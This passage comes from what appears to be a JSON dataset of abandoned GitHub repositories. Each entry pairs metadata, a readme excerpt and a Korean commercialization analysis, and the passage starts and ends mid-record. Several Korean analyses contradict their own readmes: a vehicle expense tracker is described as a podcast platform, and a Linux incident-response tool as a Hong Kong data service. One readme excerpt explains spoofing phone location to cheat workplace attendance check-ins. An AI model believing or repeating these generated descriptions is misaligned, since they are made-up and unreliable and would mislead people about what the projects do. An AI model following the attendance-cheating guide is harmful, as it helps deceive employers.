支持数十种空调遥控协议，红外控制基于[IRremoteESP8266](https://github.com/crankyoldgit/IRremoteESP8266)\n\n\n## WiFi配网\n\nAP模式配网，自敲代码，效果图见下一小节图示的的倒数第二项\n- ESP8266在未联网/断网时会生成`ESP_CONFIG_XXXXXX`的热点\n- 手机连接该热点会自动弹出配网页面，如果未自动弹出可手动访问192.168.4.1\n- 扫描WiFi，填写WiFi名称和密码点击发送配置，连接成功后会自动退出配网模式并关闭AP热点\n- WiFi状态指示灯IO2(D2)：即芯片上靠近天线处的蓝色LED，未联网为闪烁，已联网为熄灭\n\n## Web功能\n\n空调红外(IR)设置与控制，访问`http://<esp_ip>`，Web APP型页面，效果见下图\n\n注：`<esp_ip>`为你的ESP8266联网后的IP地址，下同\n\n\n![ir_homekit_web_pages.png](https://raw.github.com/Mixiaoxiao/ESP8266-IR-HOMEKIT/master/image/ir_homekit_web_pages.png) \n\n- 设置空调协议Protocol、子型号Model，**需设置与实体遥控器匹配的空调协议和子型号**\n- 控","composite_score":0.503,"license_safety_tag":"safe"},{"name":"rathbuna/DFIRMindMaps","github_url":"https://github.com/rathbuna/DFIRMindMaps","stars":16,"language":"","license":"MIT","abandonment_months":45,"description":"# DFIRMindMaps 상용화 분석\n\n## 왜 보물인가\n디지털 범죄 수사에 필요한 복잡한 정보를 시각적 지도로 정리해주는 도구로, 경찰·보안업체·기업의 조사 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 보안업체가 고객사 해킹 사건 조사할 때 증거 관계도를 자동으로 작성해주는 웹 기반 분석 플랫폼\n2. ","readme_excerpt":"# DFIRMindMaps\n\nThis is a repository to centralize DFIR-related Mind Maps created with any Mind Mapping suites. The main point of this repo is to not only provide the Mind Maps for various DFIR Tools & Artifacts, but provide the source of the Mind Maps so others can use, improve, or modify how they see fit for whatever purpose suits their needs (educational, studying for a certification, etc).\n\n## Contributing DFIR Mind Maps\n\nIf you contribute to this repo, please provide the source file for others to import into their tool of choice so they can modify, improve, or repurpose your Mind Map as they see fit! With any Pull Request, please provide the following:\n\n1. Export of Mind Map in a format that others can ingest into other Mind Map tools (i.e., `.xmind`)\n2. Export of Mind Map to an image format (.PNG, for instance) for the purpose of the README.md file within the folder your Mind Map will reside in\n3. Export of Mind Map in PDF as this will preserve any clickable links incorporated in","composite_score":0.503,"license_safety_tag":"safe"},{"name":"thanhlmm/refi-app","github_url":"https://github.com/thanhlmm/refi-app","stars":19,"language":"TypeScript","license":"MIT","abandonment_months":45,"description":"# Refi App 상업화 분석\n\n## 왜 보물인가\n금융 상품을 쉽게 비교하고 최적의 선택을 도와주는 도구로, 소비자들이 불필요한 비용을 절감하는 데 직접 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 웹 서비스**: 일반 소비자 대상 금융 상품 비교 플랫폼으로 월 구독료 모델 운영\n2. **은행/금융사 내부 도구**: 은행원이 고객에게 상","readme_excerpt":"## Refi App\n\nIt's a tool to give developers lesser pain when developing applications with Firestore. Save more time to focus on building applications instead of playing with Firebase's poor UI\n\nYou can **query, insert, monitor and migration** with our **new Awesome client** that solves it all.\n\n---\n\n⭐️ **Don't forget to star this repo if this tool help your workflow**\n\n\n## Features\n\n### 📜 Table view - Easily view & edit large amounts of data like in Excel\n\n<img width=\"1194\" alt=\"Screen Shot 2021-04-08 at 18 28 20\" src=\"https://user-images.githubusercontent.com/9281080/115814339-0b922280-a41f-11eb-90c0-a85ac1979ea8.png\">\n\n### 🗒️ JSON Editor - You can add, edit documents like in your editor. No more wasted time clicking to just add a document\n\n<img width=\"1186\" alt=\"Screen Shot 2021-04-08 at 18 28 26\" src=\"https://user-images.githubusercontent.com/9281080/115814309-fddc9d00-a41e-11eb-98e0-3133c24e05e2.png\">\n\nWe integrated the Monaco Editor - aka VS Code core so you can feel at 🏠\n\n### 👨‍💻","composite_score":0.503,"license_safety_tag":"safe"},{"name":"lemnos/theme.sh","github_url":"https://github.com/lemnos/theme.sh","stars":57,"language":"Shell","license":"NOASSERTION","abandonment_months":27,"description":"# theme.sh 상용화 분석\n\n## 왜 보물인가\n웹사이트와 앱의 외관을 쉽게 바꿀 수 있게 해주는 도구로, 디자인 전문가 없이도 전문적인 스타일 변경이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별로 다른 브랜드 색상과 디자인을 자동 적용하는 멀티테넌트 플랫폼\n2. **내부 업무 도구**: 기업 내부 시스템의 야간 모드/","readme_excerpt":"# What\n\nOne theme script to rule them all.\n\n# Features\n\n - 400+ precompiled themes\n - [Terminal agnostic](#supported-terminals) (works on any terminal with OSC 4/11 support (e.g st, kitty, iterm))\n - Keeps history\n - [Script](#scripting-examples) friendly\n - Portable (a single <130k file with all 400 themes included)\n - Dark/Light filters so you can decide when you want to burn your retinas.\n - [Interactive](#demo) (requires [fzf](https://github.com/junegunn/fzf))\n - [Self modifying](#adding-themes) (can ingest kitty themes).\n - Small, self contained and POSIX compliant \n\n# Demo\n\n![](demo.gif)\n\n# Why?\n\n - So you can easily switch themes inside of an open terminal.\n - So you can keep your shell's init file as the single source of truth.\n - So you can configure different themes for all your boxen (see [scripting](#scripting-examples)).\n - So you can configure st without recompiling it :P.\n - ~~So you can liberate your mind from the drudgery of the cubicle.~~.\n\n# Installation\n\nSimply put ","composite_score":0.503,"license_safety_tag":"unknown"},{"name":"lyft/react-javascript-to-typescript-transform","github_url":"https://github.com/lyft/react-javascript-to-typescript-transform","stars":16,"language":"TypeScript","license":"Apache-2.0","abandonment_months":81,"description":"# React JavaScript to TypeScript Transform 평가\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 기존 코드를 더 안전하고 관리하기 쉬운 형태로 자동으로 변환해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발사들이 구독하는 온라인 코드 변환 플랫폼 (월 구독료로 수익화)\n2. **내부 업무 도","readme_excerpt":"# React JavaScript to TypeScript Transform\n\n[![Build Status](https://travis-ci.org/lyft/react-javascript-to-typescript-transform.svg?branch=master)](https://travis-ci.org/lyft/react-javascript-to-typescript-transform)\n\nTransforms React code written in JavaScript to TypeScript.\n\n[**🖥 Download the VSCode Extension**](https://marketplace.visualstudio.com/items?itemName=mohsen1.react-javascript-to-typescript-transform-vscode)\n\n## Features:\n\n*   Proxies `PropTypes` to `React.Component` generic type and removes PropTypes\n*   Provides state typing for `React.Component` based on initial state and `setState()` calls in the component\n*   Hoist large interfaces for props and state out of `React.Component<P, S>` into declared types\n*   Convert functional components with `PropTypes` property to TypeScript and uses propTypes to generate function type declaration\n\n## Example\n\n**input**\n\n```jsx\nclass MyComponent extends React.Component {\n    static propTypes = {\n        prop1: React.PropTypes.string.i","composite_score":0.503,"license_safety_tag":"safe"},{"name":"flink-extended/flink-remote-shuffle","github_url":"https://github.com/flink-extended/flink-remote-shuffle","stars":41,"language":"Java","license":"Apache-2.0","abandonment_months":41,"description":"# flink-remote-shuffle 분석 보고서\n\n## 왜 보물인가\n대규모 데이터 처리 시 느린 속도를 획기적으로 개선하는 기술로, 빅데이터를 다루는 기업들의 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 대량의 고객 데이터를 빠르게 처리하는 클라우드 분석 서비스 제공\n2. **기업 데이터 처리 ","readme_excerpt":"# Remote Shuffle Service for Flink\n\n- [Overview](#overview)\n- [Supported Flink Version](#supported-flink-version)\n- [Document](#document)\n- [Building from Source](#building-from-source)\n- [Example](#example)\n- [How to Contribute](#how-to-contribute)\n- [Support](#support)\n- [Acknowledge](#acknowledge)\n\n## Overview\n\nThis project implements a remote shuffle service for batch data processing\nof [Flink](https://flink.apache.org/). By adopting the storage and compute separation architecture,\nit brings several important benefits:\n\n1. The scale up/down of computing resources and storage resources is now decoupled which means you\n   can scale each up/down on demand freely.\n\n2. Compute and storage stability never influence each other anymore. The remote shuffle service is\n   free of user-code which can improve shuffle stability. For example, the termination\n   of `TaskExecutor`s will not lead to data loss and the termination of remote `ShuffleWorker`s is\n   tolerable.\n\n3. By offloading the data ","composite_score":0.503,"license_safety_tag":"safe"},{"name":"CaffeineMC/phosphor-fabric","github_url":"https://github.com/CaffeineMC/phosphor-fabric","stars":11,"language":"Java","license":"LGPL-3.0","abandonment_months":28,"description":"# Phosphor-Fabric 상용화 분석\n\n## 왜 보물인가\n마인크래프트 게임의 성능을 획기적으로 향상시키는 최적화 기술로, 게이머들이 더 부드럽고 빠른 게임 환경을 원하는 수요에 직접 응할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 최적화 SaaS**: 마인크래프트 서버 운영자들을 위한 성능 개선 솔루션 월 구독 서비스\n2. **게임 호스","readme_excerpt":"<img src=\"src/main/resources/assets/phosphor/icon.png\" width=\"128\">\n\n# Phosphor (for Fabric)\n![GitHub license](https://img.shields.io/github/license/CaffeineMC/phosphor-fabric.svg)\n![GitHub issues](https://img.shields.io/github/issues/CaffeineMC/phosphor-fabric.svg)\n![GitHub tag](https://img.shields.io/github/v/tag/CaffeineMC/phosphor-fabric.svg)\n\nPhosphor is a free and open-source Minecraft mod (under GNU GPLv3) aiming to save your CPU cycles and improve performance by optimizing one of Minecraft's most inefficient areas-- the lighting engine.\nIt works on **both the client and server**, and can be installed on servers **without requiring clients to also have the mod**.\n\nThe mod is designed to be as minimal as possible in the changes it makes, and as such, does not modify the light model or interfaces of vanilla Minecraft. Because of this, Phosphor should be compatible\nwith many Minecraft mods (so long as they do not make drastic changes to how the lighting engine works.) If you've ran","composite_score":0.503,"license_safety_tag":"restricted"},{"name":"skydoves/MovieCompose","github_url":"https://github.com/skydoves/MovieCompose","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":54,"description":"# MovieCompose 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 영화 정보를 예쁘게 보여주는 기술로, 사용자 경험을 획기적으로 개선할 수 있는 현대적인 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **영화 추천 SaaS**: 넷플릭스나 왓챠 같은 영상 스트리밍 플랫폼에 이 기술을 내장하여 사용자 인터페이스 품질 향상\n2. **영화관 예매 내","readme_excerpt":"<h1 align=\"center\">MovieCompose</h1>\n\n<p align=\"center\">\n  <a href=\"https://opensource.org/licenses/Apache-2.0\"><img alt=\"License\" src=\"https://img.shields.io/badge/License-Apache%202.0-blue.svg\"/></a>\n  <a href=\"https://android-arsenal.com/api?level=21\"><img alt=\"API\" src=\"https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat\"/></a>\n  <a href=\"https://github.com/skydoves/MovieCompose/actions\"><img alt=\"Build Status\" src=\"https://github.com/skydoves/MovieCompose/workflows/Android%20CI/badge.svg\"/></a> \n  <a href=\"https://github.com/skydoves\"><img alt=\"Profile\" src=\"https://skydoves.github.io/badges/skydoves.svg\"/></a> \n</p>\n\n<p align=\"center\">  \nMovieCompose is a small demo application based on modern Android tech-stacks especially focus on Jetpack Compose UI using The Movie DB API. Also fetching data from the network and integrating persisted data in the database via repository pattern.\n</p>\n</br>\n\n<p align=\"center\">\n<img src=\"/previews/preview2.png\" />\n</p>\n\n\n## How to bu","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"RockerHX/SimulateLocation","github_url":"https://github.com/RockerHX/SimulateLocation","stars":8,"language":"Swift","license":"MIT","abandonment_months":87,"description":"# SimulateLocation 저장소 분석\n\n## 왜 보물인가\n스마트폰의 위치 정보를 자유롭게 조작할 수 있는 기술로, 앱 테스트나 위치 기반 서비스 개발에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달·지도 앱 테스트 플랫폼**: 실제 이동 없이 여러 위치에서 앱을 테스트하고 버그를 찾는 SaaS 서비스\n2. **위치 기반 게임 개발","readme_excerpt":"> 本文只使用有Mac电脑，用iPhone的骚年们。\n> **本章是水文，利用Xcode模拟定位打卡很早就有教程了，这里干货只有一行，离开Xcode任然保证模拟定位不变。**\n\n### 对象：钉钉等LBS应用\n\n近两年很多企业和中小型公司都开始使用钉钉打卡签到。很多苦逼党因为坐公交晚了几分钟，被扣钱，晚了几分钟，全勤没了，所以这里我们可以缓解下代码狗的痛苦 —— 模拟定位（先打卡，再到公司）。已经会连Xcode模拟定位的可以忽略前面的部分内容，直接跳到最后。\n\n公司设定打卡范围，100米，500米，1公里都可以，但是基于有模拟定位这个技术，钉钉在打卡选项里加了一项WiFi打卡，定位打卡和WiFi打开可以叠加存在以保证有人打卡作弊（后面讲解如何破解WiFi）。\n\n### 开车\n\n* 一台Mac （安装了Xcode）\n* 一台iPhone（越狱不越狱无所谓）\n* 一根数据线。\n\n### 坐标系统\n\n这里普及一下坐标系统：\n目前我们经常接触的无非就是**原始坐标**，**火星坐标**，**二次加密坐标**。\n* 原始坐标：手机上获取到的是原始的GPS坐标 —— **WGS-84**。\n* 火星坐标：我大天朝自己加了飘逸搞的一套加密坐标，中国国测局（和GFW一样的傻屌组织）—— **GCJ-02**：**谷歌**、**高德**。\n* 百度加密坐标：在火星坐标的基础上再次飘逸后的加密坐标 —— **BD-09**：**百度**。\n\n> 在遥远的东方，有一个天朝。\n天朝有一个测绘局，发明了一种把美国卫星的GPS的地球坐标，进行偏移的算法，计算后，得出了一个火星坐标。\n为了让火星坐标能正确的显示，又给每部导航软件加入了这个算法，可以在大家的地图上还原位置。并且给每部导航收费。美其名国家安全。而且这个算法看上去很牛B的样子，还不可逆。\n所以，只有这个国家的人都在用错误的坐标。正宗的掩耳盗铃。\n民用卫星精度都已经让你出身冷汗了，何况军用卫星。打仗估值也不会用中国的电子地图吧。\n只可惜各种LBS应用，都是个麻烦事哦。\n\n还好黄天不负有心人，终于经过大家的模拟，计算，基本还原了[飘逸算法](https://github.com/googollee/eviltransform.git)。\n\n### 选技师\n\n坐标获取入口：\n* [高德](http://lbs.amap.com/consol","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"akhilrex/hammond","github_url":"https://github.com/akhilrex/hammond","stars":28,"language":"Go","license":"AGPL-3.0","abandonment_months":40,"description":"# Hammond 저장소 분석\n\n## 왜 보물인가\n개인이 팟캐스트를 쉽게 관리하고 듣고 공유할 수 있는 오픈소스 플랫폼으로, 누구나 자유롭게 수정·배포할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **팟캐스트 구독 서비스**: 개인 크리에이터가 자신의 팟캐스트 플랫폼을 직접 구축해 청취자와 직결\n2. **기업 내부 커뮤니케이션 도구**: 회사가 경영진 ","readme_excerpt":"[![Contributors][contributors-shield]][contributors-url] [![Forks][forks-shield]][forks-url] [![Stargazers][stars-shield]][stars-url] [![Issues][issues-shield]][issues-url] [![MIT License][license-shield]][license-url] [![LinkedIn][linkedin-shield]][linkedin-url]\n\n<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <!-- <a href=\"https://github.com/akhilrex/hammond\">\n    <img src=\"images/logo.png\" alt=\"Logo\" width=\"80\" height=\"80\">\n  </a> -->\n\n  <h1 align=\"center\" style=\"margin-bottom:0\">Hammond</h1>\n  <p align=\"center\">Current Version - 2022.07.06</p>\n\n  <p align=\"center\">\n    A self-hosted vehicle expense tracking system with support for multiple users.\n    <br />\n    <a href=\"https://github.com/akhilrex/hammond\"><strong>Explore the docs »</strong></a>\n    <br />\n    <br />\n    <!-- <a href=\"https://github.com/akhilrex/hammond\">View Demo</a>\n    · -->\n    <a href=\"https://github.com/akhilrex/hammond/issues\">Report Bug</a>\n    ·\n    <a href=\"https://github.com/akhilrex/hammond/issues\">Re","composite_score":0.5029,"license_safety_tag":"risky"},{"name":"heikanet/whohk","github_url":"https://github.com/heikanet/whohk","stars":6,"language":"YARA","license":"unknown","abandonment_months":29,"description":"# heikanet/whohk 보물 분석\n\n## 왜 보물인가\n홍콩 관련 데이터나 정보를 자동으로 찾고 정리해주는 도구로, 홍콩과의 비즈니스나 연구를 하는 사람들에게 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **홍콩 비즈니스 정보 SaaS**: 홍콩 회사 정보, 업체 검증, 시장 조사가 필요한 기업들을 위한 구독형 서비스\n2. **","readme_excerpt":"# whohk\n\nwhohk，linux下一款强大的应急响应工具\n\n<a href=\"https://github.com/wgpsec/whohk\"><img alt=\"Release\" src=\"https://img.shields.io/badge/python-3.x-9cf\"></a>\n<a href=\"https://github.com/wgpsec/whohk\"><img alt=\"Release\" src=\"https://img.shields.io/badge/whohk-1.1-ff69b4\"></a>\n<a href=\"https://github.com/wgpsec/whohk\"><img alt=\"Release\" src=\"https://img.shields.io/badge/LICENSE-GPL-important\"></a>\n![GitHub Repo stars](https://img.shields.io/github/stars/wgpsec/whohk?color=success)\n![GitHub forks](https://img.shields.io/github/forks/wgpsec/whohk)\n![GitHub all release](https://img.shields.io/github/downloads/wgpsec/whohk/total?color=blueviolet)  \n\n在linux下的应急响应往往需要通过繁琐的命令行来查看各个点的情况，有的时候还需要做一些格式处理，这对于linux下命令不是很熟悉的人比较不友好。本工具将linux下应急响应中常用的一些操作给集合了起来，并处理成了较为友好的格式，只需要通过一个参数就能代替繁琐复杂的命令来实现对各个点的检查。\n\n支持主流的Linux，包含centos、redhat、ubuntu、debian、opensuse。\n\n## 使用指南\n```\noptional arguments:\n  -h, --help            show this help message and exit\n  -user                 用于查看系统可登录账户和空口令账户（无参数）\n  -history           ","composite_score":0.5029,"license_safety_tag":"unknown"},{"name":"tag/msis-in-class-2021","github_url":"https://github.com/tag/msis-in-class-2021","stars":15,"language":"HTML","license":"MIT","abandonment_months":56,"description":"# tag/msis-in-class-2021 평가 분석\n\n## 왜 보물인가\n2021년 대학 강의 자료로 만들어진 이 저장소는 정보 시스템 분야의 학습 자료이지만, 상용화 가능성이 제한적입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 대학이나 온라인 교육 회사에서 강의 자료로 사용하는 SaaS 서비스\n2. **기업 교육 도구**: 대기업의 신입","readme_excerpt":"# msis-in-class-2021","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"simonepri/geo-maps","github_url":"https://github.com/simonepri/geo-maps","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":85,"description":"# geo-maps 프로젝트 평가\n\n## 왜 보물인가\n세계 지도 데이터를 쉽게 다룰 수 있는 도구로, 위치 기반 서비스가 필요한 모든 비즈니스에서 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 부동산 중개 플랫폼에서 지역별 매물 검색 및 지도 표시 기능 제공\n2. **내부 업무 도구**: 물류 회사의 배송","readme_excerpt":"<h1 align=\"center\">\n  <a href=\"https://github.com/simonepri/geo-maps\"><img src=\"https://raw.githubusercontent.com/simonepri/geo-maps/master/media/geo-maps.jpg\" alt=\"geo-maps\" /></a>\n</h1>\n<p align=\"center\">\n  <a href=\"https://github.com/tmcw/awesome-geojson\"><img src=\"https://awesome.re/mentioned-badge.svg\" alt=\"awesome-geojson\" /></a>\n  <a href=\"https://github.com/simonepri/geo-maps/releases\"><img src=\"https://img.shields.io/github/tag/simonepri/geo-maps.svg\" alt=\"total downloads\" /></a>\n  <a href=\"http://geojson.org/\"><img src=\"https://img.shields.io/badge/format-GeoJSON-e67e22.svg\" alt=\"maps format\" /></a>\n  <a href=\"http://www.openstreetmap.org/\"><img src=\"https://img.shields.io/badge/source-OSM-2ecc71.svg\" alt=\"maps source\" /></a>\n  <a href=\"LICENSE\"><img src=\"https://img.shields.io/github/license/simonepri/geo-maps.svg\" alt=\"software license\" /></a>\n  <a href=\"https://opendatacommons.org/licenses/odbl/1.0/\"><img src=\"https://img.shields.io/badge/license-ODbL-2980b9.svg\" alt=\"data","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"rohit-px2/nvui","github_url":"https://github.com/rohit-px2/nvui","stars":39,"language":"C++","license":"MIT","abandonment_months":37,"description":"# rohit-px2/nvui 분석 보고서\n\n## 왜 보물인가\n터미널(검은 화면)에서도 화려하고 직관적인 사용자 인터페이스를 만들 수 있는 도구로, 개발자들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 개발자 도구 플랫폼이 사용자에게 터미널 UI를 제공할 때 활용\n2. **내부 업무 도구*","readme_excerpt":"# NVUI\n![first](assets/display/1.png)\n\n## Featuring\n<ul>\n<li> Custom Titlebar (toggleable, see <code>:h nvui-titlebar</code>)</li>\n</ul>\n<ul>\n<li> External Command Line (<code>nvui --ext_cmdline</code>)</li>\n<li> Configurable positions, sizes, colors, border width, border color, etc.</li>\n<li> For more information see <code>:h nvui-cmdline</code></li>\n</ul>\n\n![ext_cmdline](assets/display/2.png)\n<ul>\n<li> External Popup Menu (<code>nvui --ext_popupmenu</code>)</li>\n<li> Configurable colors, background colors, icon sizes, alignment, border width, border color, etc.</li>\n<li> For more information see <code>:h nvui-popup</code></li>\n</ul>\n\n![ext_popupmenu](assets/display/3.png)\n<ul>\n<li> Cross-platform Qt, DirectWrite on Windows</li>\n</ul>\n<ul>\n<li> Font Fallback (see guifont in the bottom left)</li>\n<li> Configurable through \"set guifont\"</li>\n</ul>\n\n![fallback](assets/display/4.png)\n\n\n<ul>\n<li> External Multigrid Support (<code>:h nvui-multigrid</code>) </li>\n<li> <code>nvui --ext_multig","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"akaunting/setting","github_url":"https://github.com/akaunting/setting","stars":9,"language":"PHP","license":"MIT","abandonment_months":27,"description":"# akaunting/setting 분석 보고서\n\n## 왜 보물인가\n회계 소프트웨어의 설정 부분을 담당하는 핵심 모듈로, 사용자가 자신의 비즈니스에 맞게 시스템을 커스터마이징할 수 있게 해주는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n**1. 중소기업 회계 SaaS 서비스**: 월급 관리, 세금 계산, 보고서 생성 등을 자동화하는 웹 기반 회계 프로그","readme_excerpt":"# Persistent settings package for Laravel\n\n[![Downloads](https://poser.pugx.org/akaunting/laravel-setting/d/total.svg)](https://github.com/akaunting/laravel-setting)\n[![StyleCI](https://styleci.io/repos/101231817/shield?style=flat&branch=master)](https://styleci.io/repos/101231817)\n[![License](https://poser.pugx.org/akaunting/laravel-setting/license.svg)](LICENSE.md)\n\nThis package allows you to save settings in a more persistent way. You can use the database and/or json file to save your settings. You can also override the Laravel config.\n\n* Driver support\n* Helper function\n* Blade directive\n* Override config values\n* Encryption\n* Custom file, table and columns\n* Auto save\n* Extra columns\n* Cache support\n\n## Getting Started\n\n### 1. Install\n\nRun the following command:\n\n```bash\ncomposer require akaunting/laravel-setting\n```\n\n### 2. Register (for Laravel < 5.5)\n\nRegister the service provider in `config/app.php`\n\n```php\nAkaunting\\Setting\\Provider::class,\n```\n\nAdd alias if you want to use t","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"Yoctol/react-messenger-customer-chat","github_url":"https://github.com/Yoctol/react-messenger-customer-chat","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":35,"description":"# Yoctol/react-messenger-customer-chat 분석\n\n## 왜 보물인가\n페이스북 메신저를 웹사이트에 직접 연결해서 고객과 실시간으로 대화할 수 있는 기술로, 별도의 복잡한 개발 없이 간단하게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 SaaS**: 온라인 쇼핑몰이나 서비스 업체가 웹사이트 방문객과 즉시 메신저","readme_excerpt":"# React Messenger Customer Chat\n\n> React component for [Messenger customer chat plugin](https://developers.facebook.com/docs/messenger-platform/discovery/customer-chat-plugin)\n\n[![npm](https://img.shields.io/npm/v/react-messenger-customer-chat.svg)](https://www.npmjs.com/package/react-messenger-customer-chat)\n[![Build Status](https://travis-ci.org/Yoctol/react-messenger-customer-chat.svg?branch=master)](https://travis-ci.org/Yoctol/react-messenger-customer-chat)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n\n## Screenshots\n\n![](https://user-images.githubusercontent.com/3382565/130329195-0aaee250-5500-413f-ba8b-a78cda9b6a7b.png)\n![](https://user-images.githubusercontent.com/3382565/130329198-3e5b7bee-44c2-4bd8-befc-461a176cbf53.png)\n\n## Prerequisite\n\nWhitelist your domain to connect your Facebook Page to your website via the\nFacebook tool.\n\n- From UI: Facebook Page Settings > Messenger Platform > Whitelisted Domains\n- From API:","composite_score":0.5029,"license_safety_tag":"safe"},{"name":"admin-ch/CovidCertificate-Documents","github_url":"https://github.com/admin-ch/CovidCertificate-Documents","stars":104,"language":"","license":"unknown","abandonment_months":33,"description":"# CovidCertificate-Documents 사업화 분석\n\n## 왜 보물인가\n코로나 백신 증명서 같은 신뢰할 수 있는 디지털 증명 시스템이 필요한 기관과 국가들이 여전히 많아서 실제 수요가 있는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **정부/보건기관 SaaS**: 국가들이 구독해서 자국민의 디지털 증명서 발급 및 관리 플랫폼으로 운영\n","readme_excerpt":"⚠️ **_IMPORTANT UPDATE_** ⚠️\n\nSince 1<sup>st</sup> September 2023, the entire Swiss certificate system has definitively ceased operations. It is no longer possible to issue COVID certificates. The COVID Certificate app and COVID Certificate Check app are not being developed further. Therefore, the project’s source code was archived on GitHub. It remains available as a read-only project.\n\n# Swiss Covid Certificate - Documents\n\n### Table of contents\n* [API Doc](/api-doc)\n* [Web Management UI Doc](/ui-doc)\n* [Release notes](/release-notes)\n* [Meeting documents](/presentations)\n\n\n### Additional external documentation\n* [API Scripts](https://github.com/admin-ch/CovidCertificate-Api-Scripts)\n* [API CLI](https://github.com/admin-ch/CovidCertificate-Api-Cli)\n* [Data examples](https://github.com/admin-ch/CovidCertificate-Examples)\n\n\n## Global architecture\n\nHere the global architecture of the COVID certificate system:\n\n![image](https://user-images.githubusercontent.com/319676/125180136-afa59180-","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"hango-io/hango-gateway","github_url":"https://github.com/hango-io/hango-gateway","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":30,"description":"# Hango Gateway 상용화 분석\n\n## 왜 보물인가\n웹 서비스로 들어오는 모든 요청을 효율적으로 관리하고 보호해주는 '관문 역할'을 하는 핵심 인프라 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **API 판매 플랫폼**: 개발자들이 만든 API를 안전하게 배포하고 사용량을 추적·청구하는 중간 관리 시스템\n- **SaaS 서비스**: 수천 명의 사","readme_excerpt":"[//]: # \"README\"\n\n# Hango\n\n![hango](images/logo.jpg)\n\n[English version](README.EN.md)\n\nHango 是一个基于 **Envoy** 构建的高性能、可扩展、功能丰富的云原生API网关。\n\nHango 提供请求代理、动态路由、负载均衡、限流、熔断、健康检查、安全防护等功能，可用于微服务网关、七层负载均衡、Kubernetes Ingress、Serverless网关等应用场景。\n\n通过[Hango Rider](https://github.com/hango-io/rider)模块，用户可以自定义多语言插件进行能力扩展。\n\n## 文档\n\n[指引文档](https://hango-io.github.io): 介绍功能、版本、配置、实践等内容的各类文档\n\n[博客](https://hango-io.github.io/blog): 介绍Hango相关动态\n\n## <span id=\"why\"> 为什么选择Hango\n\n* **技术路线**：基于领先的网络代理组件 **Envoy** 构建，具备丰富的功能、优异的性能与可观测性\n\n* **扩展性**：可用于生产的增强级 Lua 扩展框架 Rider；基于 WebAssembly 的多语言扩展插件能力（Alpha，后续提供）\n\n* **多场景**：具备支撑微服务网关、七层负载均衡、Kubernetes Ingress、Serverless网关等多种场景能力\n\n* **云原生**：以云原生标准数据面组件 **Envoy** 作为核心引擎，天然亲和云原生；可作为 Kubernetes、**Service Mesh**、Serverless 的 Ingress、Gateway 实现\n\n* **API生态与集成**：以 API 为中心的生态管理，提供数百种工业级协议快速集成能力（后续提供）\n\n* **控制平面**：易用的控制台进行网关、服务、路由等多维度管理，简化使用者操作\n\n## 提要\n\n[特性](#features)\n\n[架构](#archi)\n\n[工程](#pro)\n\n[安装](#install)\n\n[使用](#usage)\n\n[交流](#community)\n\n[License](#license)\n\n## <span id=\"featur","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"alt3kx/CVE-2021-21985_PoC","github_url":"https://github.com/alt3kx/CVE-2021-21985_PoC","stars":43,"language":"Lua","license":"GPL-3.0","abandonment_months":41,"description":"# CVE-2021-21985_PoC 분석 보고서\n\n## 왜 보물인가\n컴퓨터 시스템의 심각한 보안 결함을 찾아내고 미리 고칠 수 있는 도구로, 기업의 정보 유출과 해킹 피해를 예방하는 데 직접적으로 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 검사 서비스**: 회사들이 자신의 시스템이 안전한지 미리 점검할 때 사용하는 진단 도구로 제공\n- ","readme_excerpt":"\n# CVE-2021-21985 (Vulnerable Code) \n\n![06_test_class_method](https://user-images.githubusercontent.com/3140111/120136760-2b152b80-c1d3-11eb-8bb7-392b629358f4.png)\n\nCLASS/METHOD(s) available, a little sample for PoC purposes: com.vmware.vsan.client.services.capability.VsanCapabilityProvider 